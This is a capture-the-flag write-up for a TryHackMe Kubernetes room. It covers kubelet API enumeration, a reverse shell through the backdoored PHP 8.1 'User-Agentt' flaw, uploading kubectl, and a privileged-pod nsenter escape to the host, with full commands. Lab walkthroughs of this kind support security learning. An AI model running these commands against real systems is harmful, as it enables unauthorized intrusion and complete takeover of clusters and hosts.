Frank and Herby try again...

This challenge is available in TryHackMe at https://tryhackme.com/room/frankandherbytryagain

TL;DR

  1. Scan for open ports
  2. Exploit vulnerable PHP pod
  3. Gain access to the kubernetes control plane node

Solution

Scanning

The first step is to scan the host for the open ports. We will use the following command to scan all ports, save output and run scripts on the open ones:

nmap -vvv IP -oA kubernetes -A -p-

We find that there are 8 open ports: 22, 10250, 10255, 10257, 10259, 16443, 25000 and 30679.

Port 22 is correctly identified as SSH, and the other ports are either identified as unknown or with something that is not very helpful.

Looking at the Kubernetes Documentation we find that port 10250 corresponds to the kubelet API, port 10257 corresponds to kube-controller-manager and port 10259 to kube-controller-manager, on Kubernetes control plane nodes.

Port 30679 corresponds to a service runnning on a worker node.

With this information, we can infer that the given IP corresponds to a machine that is simultaneously a control plane node and a worker node, that is, the same machine controls the Kubernetes cluster and runs containers.

Exploration

The Kubelet API

The kubelet API is undocumented, however its endpoints are known. Some of them are:

/metrics -> Report kubelets own statistics
/pods    -> Information about the pods deployed on the node
/stats/  -> Statistical information for the resources in the node
/logs/   -> Logs
/exec/   -> Manage pods and containers
/run/    -> Manage pods and containers
/attach/ -> Manage pods and containers

If we try to access these endpoints on port 10250 they will return Unauthorized, since we don't have the token to access the kubelet API. However, we also have port 10255 open, which provides unauthenticated, read-only access to the same API. Testing the same endpoints in this port we can obtain information only on /metrics and on /pods, because the others have been disabled.

Parsing the JSON information we obtained in /pods, we can see there are 4 pods running in the machine:

calico-node             
calico-kube-controllers 
coredns                 
php-deploy              

The first 3 are from the Kubernetes cluster and are not of our interest (they are on the kube-system namespace). php-deploy on the other hand is on the namespace frankland and has only one container from the image vulhub/php:8.1-backdoor. Adding to this, it also has access to the kubernetes API through a service account - the secrets are mounted in /var/run/secrets/kubernetes.io/serviceaccount.

This means that this pod has access to the Kubelet API and can be our entrypoint.

NOTE: Ports 16433 and 25000 were not used, however, they are documented in microk8s as the API server and the cluster-agent, respectively. So, this room is using microk8s on the Kubernetes cluster instead of the normal k8s, however, this will not affect our exploitation, as those ports required authentication in order to perform any action.

The vulnerable container

If we look for the image name we found previously, we see that it is a container image with a webserver that contains a PHP version that was published with a backdoor. If the header User-Agentt header is sent, an attacker can perform remote code execution on the website. More information aboutit can be found here.

Using the scripts from this repo we are able to either execute any command or obtain a reverse shell.

First we need to setup our listener, we will use pwncat since it is easier to upload files and it stabilizes our shell automatically. We run:

pwncat-cs -lp 9000

Now, we need to get a reverse shell, so we will use the script in the repo, obtaining our IP with the command:

ip a show tun0

Finally, we run the script:

python3 revshell_php_8.1.0-dev.py http://MACHINE_IP:30679 OUR_IP 9000

We then land on a root shell inside the container (seemed too easy). Taking a look around there isn't much to see, besides the previously mentioned kubernetes secrets. Going to /root we can see a hidden folder .kube, so if we upload kubectl to the container, we are able to interact with the kubelet API, authenticated as we have an API token.

Pwncat will now be very helpful, since curl and wget are not present in the container (and it doesn't have internet access), so we need to upload kubectl. We can do this by changing to a local shell by pressing Ctrl+D and then upload a file using the command (assuming we have already download kubectl):

upload <path to kubectl> /usr/bin

Then we need to make it executable:

chmod +x /usr/bin/kubectl

Now, we test if we can use it:

kubectl get pods

And we see the running pod (which we already have access to), so our access to the cluster is granted.

The missing policy

Kubernetes by default doesn't allow a container in a pod to access any devices on the host, however, there is a special type of containers - Privileged containers - that is given access to all devices on the host. So, if we are capable of running one container of this type, we are able to access the host filesystem.

First, we need to check if we can create new pods in the current namespace with the command:

kubectl auth can-i create pods

which tells us that we can. Let's go a step further and check if we can do everything we want in any namespace with the command:

kubectl auth can-i '*' '*'

YES!, we can do everything we want in any namespace we want, as Frank and Herby didn't define an appropriate PodSecurityPolicy. So, we are able to spawn a container that runs in privileged mode and take ownership of this cluster.

To access the host we will run the following command, that can be found in HackTricks:

kubectl run r00t --restart=Never -it --image something --rm --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"vulhub/php:8.1-backdoor","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'

Let's dissect it in order to understand what is happening:

  • kubectl - well, it is obvious what it does: interact with a Kubernetes cluster
  • run r00t - start a pod named r00t
  • --restart=Never - if the pod stops, do not restart it
  • -it - allocate a TTY for the container in the pod and attach stdin to it (i.e. allows us to interact with the container)
  • --image something - here we should have the image for the pod, however since it will be overridden it can be anything
  • --rm - delete the pod after it exits
  • --overrides - inline JSON to override the generated object

Now we will take a look at the values we are overriding.

{
    "spec": {
        "hostPID": true,
        "containers": [{
            "name": "1",
            "image": "vulhub/php:8.1-backdoor",
            "command": ["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],
            "stdin": true,
            "tty":true,
            "imagePullPolicy":"IfNotPresent",
            "securityContext": {
                "privileged": true
            }
        }]
    }
}

After prettifying the overriding values we can see that the pod will share the host process ID namespace (hostPID), will have one container that will use the image we already have in our node (since we don't have access to the internet - we had to make this change) and will run in privileged mode.

The command that is going to be executed when the container starts is nsenter which allow us to run a program in a different namespace. The flag --mount=/proc/1/ns/mnt tells nsenter to enter the mount namespace (AKA filesystems) of process with PID 1, which is the init process, which means, we will execute /bin/bash in the host filesystem (because we are refering to the init of the host and not to the one of the container, due to the hostPID value) AKA we are inside the host.

We are then dropped again in a root shell but this time inside the host, so all we need to do is retrieve the flags from /home/herby/user.txt and /root/root.txt.

I would like to thank kninja, the creator of this challenge, because it was very challenging but also allowed me to learn a lot how to move inside a misconfigured Kubernetes cluster.